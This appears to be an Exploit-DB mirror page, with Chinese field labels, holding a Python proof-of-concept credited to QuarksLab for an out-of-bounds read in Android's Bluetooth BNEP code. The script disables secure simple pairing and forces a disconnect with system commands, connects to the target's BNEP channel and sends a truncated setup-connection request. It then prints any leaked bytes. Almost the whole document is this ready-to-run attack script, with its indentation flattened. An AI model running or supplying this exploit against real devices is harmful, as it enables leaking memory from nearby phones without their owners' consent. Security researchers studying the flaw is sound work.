Android Bluetooth – BNEP BNEP_SETUP_CONNECTION_REQUEST_MSG Out-of-Bounds Read

  • 作者: QuarksLab
    日期: 2018-03-23
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/44327/
  • import os
    import sys
    import struct
    
    import bluetooth
    
    
    BNEP_PSM = 15
    BNEP_FRAME_CONTROL = 0x01
    
    # Control types (parsed by bnep_process_control_packet() in bnep_utils.cc)
    BNEP_SETUP_CONNECTION_REQUEST_MSG = 0x01
    
    
    def oob_read(src_bdaddr, dst):
    
    bnep = bluetooth.BluetoothSocket(bluetooth.L2CAP)
    bnep.settimeout(5)
    bnep.bind((src_bdaddr, 0))
    print 'Connecting to BNEP...'
    bnep.connect((dst, BNEP_PSM))
    bnep.settimeout(1)
    print "Triggering OOB read (you may need a debugger to verify that it's actually happening)..."
    
    # This crafted BNEP packet just contains the BNEP_FRAME_CONTROL frame type,
    # plus the BNEP_SETUP_CONNECTION_REQUEST_MSG control type.
    # It doesn't include the 'len' field, therefore it is read from out of bounds
    bnep.send(struct.pack('<BB', BNEP_FRAME_CONTROL, BNEP_SETUP_CONNECTION_REQUEST_MSG))
    try:
    data = bnep.recv(3)
    except bluetooth.btcommon.BluetoothError:
    data = ''
    
    if data:
    print '%r' % data
    else:
    print '[No data]'
    
    print 'Closing connection.'
    bnep.close()
    
    
    def main(src_hci, dst):
    os.system('hciconfig %s sspmode 0' % (src_hci,))
    os.system('hcitool dc %s' % (dst,))
    
    oob_read(src_hci, dst)
    
    
    if __name__ == '__main__':
    if len(sys.argv) < 3:
    print('Usage: python bnep02.py <src-bdaddr> <dst-bdaddr>')
    else:
    if os.getuid():
    print 'Error: This script must be run as root.'
    else:
    main(sys.argv[1], sys.argv[2])